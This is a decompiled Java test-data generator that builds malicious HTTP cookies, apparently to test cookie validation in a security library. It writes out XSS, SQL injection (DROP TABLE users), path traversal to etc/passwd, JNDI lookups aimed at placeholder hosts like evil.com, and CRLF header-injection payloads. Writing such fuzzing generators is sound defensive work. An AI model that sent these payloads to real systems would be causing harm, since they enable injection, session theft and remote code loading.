/*
 * Decompiled with CFR 0.152.
 */
package de.cuioss.http.security.generators.cookie;

import de.cuioss.http.security.data.Cookie;
import de.cuioss.test.generator.Generators;
import de.cuioss.test.generator.TypedGenerator;

public class AttackCookieGenerator
implements TypedGenerator<Cookie> {
    private final TypedGenerator<Integer> attackTypeGenerator = Generators.integers((int)0, (int)3);
    private final TypedGenerator<Integer> longStringSize = Generators.integers((int)100, (int)200);
    private final TypedGenerator<Integer> veryLongStringSize = Generators.integers((int)5000, (int)8000);

    public Cookie next() {
        int attackType = (Integer)this.attackTypeGenerator.next();
        String name = switch (attackType) {
            case 0 -> this.generateMaliciousName();
            case 1 -> this.generateSpecialCharName();
            case 2 -> this.generateControlCharName();
            case 3 -> this.generateVeryLongName();
            default -> this.generateMaliciousName();
        };
        String value = this.generateAttackValue();
        String attributes = this.generateMaliciousAttributes();
        return new Cookie(name, value, attributes);
    }

    private String generateMaliciousName() {
        int nameType = (Integer)Generators.integers((int)0, (int)6).next();
        return switch (nameType) {
            case 0 -> "";
            case 1 -> "   ";
            case 2 -> "cookie with spaces";
            case 3 -> "cookie=equals";
            case 4 -> "cookie;semicolon";
            case 5 -> "cookie,comma";
            case 6 -> "cookie[bracket]";
            default -> "";
        };
    }

    private String generateSpecialCharName() {
        int charType = (Integer)Generators.integers((int)0, (int)4).next();
        return switch (charType) {
            case 0 -> "cookie{brace}";
            case 1 -> "cookie|pipe";
            case 2 -> "cookie\\backslash";
            case 3 -> "cookie\"quote";
            case 4 -> "cookie'apostrophe";
            default -> "cookie{brace}";
        };
    }

    private String generateControlCharName() {
        int controlType = (Integer)Generators.integers((int)0, (int)2).next();
        return switch (controlType) {
            case 0 -> "cookie\ttab";
            case 1 -> "cookie\nnewline";
            case 2 -> "cookie\rcarriage";
            default -> "cookie\ttab";
        };
    }

    private String generateVeryLongName() {
        String baseName = "very_long_cookie_name_";
        int size = (Integer)this.longStringSize.next();
        return baseName + (String)Generators.letterStrings((int)size, (int)(size + 50)).next();
    }

    private String generateAttackValue() {
        int attackType = (Integer)Generators.integers((int)0, (int)10).next();
        return switch (attackType) {
            case 0 -> this.generateXSSAttack();
            case 1 -> this.generateSQLInjection();
            case 2 -> this.generatePathTraversal();
            case 3 -> this.generateNullByteAttack();
            case 4 -> this.generateJNDIAttack();
            case 5 -> this.generateHeaderInjection();
            case 6 -> this.generateUnicodeAttack();
            case 7 -> this.generateControlCharAttack();
            case 8 -> this.generateVeryLongValue();
            case 9 -> this.generateJavaScriptProtocolAttack();
            case 10 -> this.generateDataUrlAttack();
            default -> this.generateXSSAttack();
        };
    }

    private String generateXSSAttack() {
        int tagType = (Integer)Generators.integers((int)0, (int)3).next();
        String tag = switch (tagType) {
            case 0 -> "script";
            case 1 -> "img";
            case 2 -> "iframe";
            case 3 -> "object";
            default -> "script";
        };
        int payloadType = (Integer)Generators.integers((int)0, (int)2).next();
        String payload = switch (payloadType) {
            case 0 -> "alert('xss')";
            case 1 -> "alert(1)";
            case 2 -> "alert(document.cookie)";
            default -> "alert(1)";
        };
        return "<" + tag + ">" + payload + "</" + tag + ">";
    }

    private String generateSQLInjection() {
        int commandType = (Integer)Generators.integers((int)0, (int)2).next();
        String command = switch (commandType) {
            case 0 -> "DROP TABLE";
            case 1 -> "DELETE FROM";
            case 2 -> "INSERT INTO";
            default -> "DROP TABLE";
        };
        int tableType = (Integer)Generators.integers((int)0, (int)2).next();
        String table = switch (tableType) {
            case 0 -> "sessions";
            case 1 -> "users";
            case 2 -> "cookies";
            default -> "users";
        };
        return "'; " + command + " " + table + "; --";
    }

    private String generatePathTraversal() {
        int depth = (Integer)Generators.integers((int)2, (int)5).next();
        StringBuilder path = new StringBuilder();
        path.append("../".repeat(Math.max(0, depth)));
        int pathType = (Integer)Generators.integers((int)0, (int)2).next();
        String systemPath = switch (pathType) {
            case 0 -> "etc/passwd";
            case 1 -> "windows/win.ini";
            case 2 -> "admin/config";
            default -> "etc/passwd";
        };
        path.append(systemPath);
        return path.toString();
    }

    private String generateNullByteAttack() {
        int nullByteType = (Integer)Generators.integers((int)0, (int)1).next();
        return switch (nullByteType) {
            case 0 -> "\u0000null_byte";
            case 1 -> "value\u0000truncated";
            default -> "\u0000null_byte";
        };
    }

    private String generateJNDIAttack() {
        int domainType = (Integer)Generators.integers((int)0, (int)2).next();
        String domain = switch (domainType) {
            case 0 -> "evil.com";
            case 1 -> "attacker.net";
            case 2 -> "malicious.org";
            default -> "evil.com";
        };
        return "${jndi:ldap://" + domain + "/}";
    }

    private String generateHeaderInjection() {
        int injectionType = (Integer)Generators.integers((int)0, (int)3).next();
        return switch (injectionType) {
            case 0 -> "\r\nSet-Cookie: injected=value";
            case 1 -> "\r\n\r\nHTTP/1.1 200 OK";
            case 2 -> "%0d%0aSet-Cookie: evil=bad";
            case 3 -> "value%0d%0aSet-Cookie: injected=1";
            default -> "\r\nSet-Cookie: injected=value";
        };
    }

    private String generateUnicodeAttack() {
        return "\u202e\u202d";
    }

    private String generateControlCharAttack() {
        int controlType = (Integer)Generators.integers((int)0, (int)2).next();
        String control = switch (controlType) {
            case 0 -> "\t";
            case 1 -> "\r";
            case 2 -> "\n";
            default -> "\t";
        };
        return control + " injected";
    }

    private String generateVeryLongValue() {
        int size = (Integer)this.veryLongStringSize.next();
        return (String)Generators.letterStrings((int)size, (int)(size + 1000)).next();
    }

    private String generateJavaScriptProtocolAttack() {
        int payloadType = (Integer)Generators.integers((int)0, (int)2).next();
        String payload = switch (payloadType) {
            case 0 -> "alert(1)";
            case 1 -> "alert('xss')";
            case 2 -> "alert(document.cookie)";
            default -> "alert(1)";
        };
        return "javascript:" + payload;
    }

    private String generateDataUrlAttack() {
        int payloadType = (Integer)Generators.integers((int)0, (int)2).next();
        String payload = switch (payloadType) {
            case 0 -> "alert(1)";
            case 1 -> "alert('xss')";
            case 2 -> "<script>alert(1)</script>";
            default -> "alert(1)";
        };
        return "data:text/html," + payload;
    }

    private String generateMaliciousAttributes() {
        int attributeType = (Integer)Generators.integers((int)0, (int)3).next();
        return switch (attributeType) {
            case 0 -> this.generateMaliciousDomainAttribute();
            case 1 -> this.generateTraversalPathAttribute();
            case 2 -> this.generateHeaderInjectionAttribute();
            case 3 -> this.generateMalformedAttributes();
            default -> this.generateMaliciousDomainAttribute();
        };
    }

    private String generateMaliciousDomainAttribute() {
        int domainType = (Integer)Generators.integers((int)0, (int)2).next();
        String domain = switch (domainType) {
            case 0 -> ".evil.com";
            case 1 -> ".attacker.net";
            case 2 -> ".malicious.org";
            default -> ".evil.com";
        };
        return "Domain=" + domain + "; Path=/";
    }

    private String generateTraversalPathAttribute() {
        return "Path=../../../";
    }

    private String generateHeaderInjectionAttribute() {
        int injectionType = (Integer)Generators.integers((int)0, (int)2).next();
        return switch (injectionType) {
            case 0 -> "Domain=example.com\r\nSet-Cookie: evil=bad";
            case 1 -> "Path=/\u0000/admin";
            case 2 -> "Max-Age=-1";
            default -> "Domain=example.com\r\nSet-Cookie: evil=bad";
        };
    }

    private String generateMalformedAttributes() {
        int malformType = (Integer)Generators.integers((int)0, (int)3).next();
        return switch (malformType) {
            case 0 -> "Domain=; Path=";
            case 1 -> "Invalid=Attribute; Bad=Value";
            case 2 -> "Domain=";
            case 3 -> "=; Path=/";
            default -> "Domain=; Path=";
        };
    }

    public Class<Cookie> getType() {
        return Cookie.class;
    }
}

